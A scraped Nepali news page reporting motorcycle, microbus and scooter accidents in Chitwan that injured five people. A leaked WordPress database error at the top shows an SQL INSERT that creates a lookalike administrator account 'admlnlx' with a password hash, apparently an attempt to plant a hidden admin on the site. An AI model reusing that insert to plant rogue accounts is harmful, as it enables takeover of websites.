WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgmVPagC.kEcM4F33fIVhvsASprOdT1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:31:14', '', 'admlnlx', 'admlnlx')
चितवन, माघ २१–
चितवनमा आज भएको छुट्टाछुट्टै दुर्घटनामा परि पाँच जना घाईते भएका छन् ।
जिल्लाको भरतपुर–६ धर्मचोक स्थित ना १४ प ३४३३ नम्बरको मोटरसाईकल र विपरित दिशाबाट आउँदै गरेको ना १२ प ६७९ नम्बरको मोटरसाईकल एक आपसमा ठक्कर खाँदा दुवै मोटरसाईकल चाकल घाईते भएका छन् । उनीहरु दुवैको चितवन मेडिकल कलेजमा उपचार भएको छ । घाईते हुनेमा ना १४ प ३४३३ नम्बरका मोटरसाइृकल चालक भरतपुर– १६ बस्ने वर्ष २० का सोनाम नेपाली र ना १२ प ६७९ नम्बरका मोटरसाईकल चालक भरतपुर–४ बस्ने वर्ष ४० का किरण मुल्मी रहेका छन् ।
यस्तै कविलाश गाविस–२ दासढुङ्गा स्थित माईक्रोले मोटरसाईकललाई ठक्कर दिँदा एक जना घाईते भएका छन् । मुग्लिनबाट नारायणगढ तर्फ आउदै गरेको बा ६९ प ५८३२ नम्बरको मोटरसाईकललाई सोहि दिशाबाट आउदै गरेको बा ४ ख ७४४ नम्बरको माईक्रोले पछाडिबाट ठक्कर दिदा मोटरसाईकल चालक काठमाण्डौ खुमटार १४ बस्ने वर्ष २९ को दिनेश आचार्य घाईते भएका छन् । उनको चितवन मेडिकल कलेजमा उपचार भईरहेको प्रहरीले जनाएको छ ।
यसैगरि आजै भरतपुर–१०स्थित चितवन मेडिकल कलेज अगाडि ना २८ प ८१६८ नम्बरको स्कुटीले दुई जना पैदलयात्रीलाई ठक्कर दिएको छ । उनीहरुको चितवन मेडिकल कलेजमा उपचार भईरहेको छ । स्कूटीको खोजी कार्य भईरहेको प्रहरीले जनाएको छ ।